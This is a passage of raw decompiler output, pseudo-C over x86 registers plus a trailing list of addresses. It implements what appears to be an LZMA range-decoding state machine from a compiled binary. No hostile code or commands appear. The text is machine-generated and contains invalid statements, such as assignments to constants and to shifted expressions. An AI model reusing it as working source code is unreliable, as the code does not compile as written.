                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L99:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L164:
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											L100:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t334 = __ebp - 0x70;
                                                											 *_t334 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t334;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L101;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L159:
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											L38:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											L40:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												L45:
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L160:
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											L47:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												L49:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													L53:
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L161:
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											L59:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												L65:
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L109:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L165:
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											L110:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t365 = __ebp - 0x70;
                                                											 *_t365 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t365;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L111;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											goto L132;
                                                										case 0x12:
                                                											L128:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L131:
                                                												__eax =  *(__ebp - 0x58);
                                                												 *(__ebp - 0x84) = 0x13;
                                                												__esi =  *(__ebp - 0x58) + 2;
                                                												L132:
                                                												 *(_t644 - 0x54) = _t642;
                                                												goto L133;
                                                											}
                                                											L129:
                                                											__eax =  *(__ebp - 0x4c);
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											__eflags = __eax;
                                                											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                											goto L130;
                                                										case 0x13:
                                                											L141:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L143:
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												L144:
                                                												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                												L145:
                                                												 *(_t644 - 0x50) = 1;
                                                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                												goto L149;
                                                											}
                                                											L142:
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											L130:
                                                											 *(__ebp - 0x58) = __eax;
                                                											 *(__ebp - 0x40) = 3;
                                                											goto L144;
                                                										case 0x14:
                                                											L156:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											while(1) {
                                                												L140:
                                                												 *(_t644 - 0x88) = _t537;
                                                												goto L1;
                                                											}
                                                										case 0x15:
                                                											L91:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L120;
                                                										case 0x16:
                                                											goto L0;
                                                										case 0x17:
                                                											while(1) {
                                                												L145:
                                                												 *(_t644 - 0x50) = 1;
                                                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                												goto L149;
                                                											}
                                                										case 0x18:
                                                											goto L146;
                                                										case 0x19:
                                                											L94:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												L98:
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L119:
                                                												_t393 = __ebp - 0x2c;
                                                												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t393;
                                                												L120:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													L166:
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												L121:
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												L122:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t400 = __ebp - 0x60;
                                                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t400;
                                                												goto L123;
                                                											}
                                                											L95:
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												L97:
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L102:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													L107:
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L108:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L112:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														L118:
                                                														_t391 = __ebp - 0x2c;
                                                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t391;
                                                														goto L119;
                                                													}
                                                													L113:
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L111:
                                                														_t368 = __ebp - 0x48;
                                                														 *_t368 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t368;
                                                														goto L112;
                                                													} else {
                                                														L117:
                                                														goto L109;
                                                													}
                                                												}
                                                												L103:
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L101:
                                                													_t338 = __ebp - 0x48;
                                                													 *_t338 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t338;
                                                													goto L102;
                                                												} else {
                                                													L106:
                                                													goto L99;
                                                												}
                                                											}
                                                											L96:
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L108;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												L162:
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											L57:
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L80;
                                                										case 0x1b:
                                                											L76:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												L163:
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											L77:
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t275 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t275;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t284 = __ebp - 0x64;
                                                											 *_t284 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t284;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L80:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L81;
                                                										case 0x1c:
                                                											while(1) {
                                                												L123:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												L124:
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t414 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t414;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t414;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L127:
                                                													L81:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											L167:
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											goto L170;
                                                									}
                                                								}
                                                								L171:
                                                								_t539 = _t538 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}















                                                0x00407033
                                                0x00407033
                                                0x00407033
                                                0x00407033
                                                0x00407039
                                                0x0040703d
                                                0x00407041
                                                0x0040704b
                                                0x00407059
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x00000000
                                                0x00000000
                                                0x0040736c
                                                0x00407375
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073c3
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x0040736a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004073c5
                                                0x004073c5
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x0040747a
                                                0x00407484
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x004074a0
                                                0x00407348
                                                0x0040734e
                                                0x00407355
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00000000
                                                0x00407360
                                                0x004073ca
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00406a91
                                                0x00000000
                                                0x00406a98
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa2
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406afd
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b47
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b71
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bb7
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x0040746e
                                                0x00000000
                                                0x0040746e
                                                0x004072c5
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x00000000
                                                0x00406c8b
                                                0x00406c05
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f07
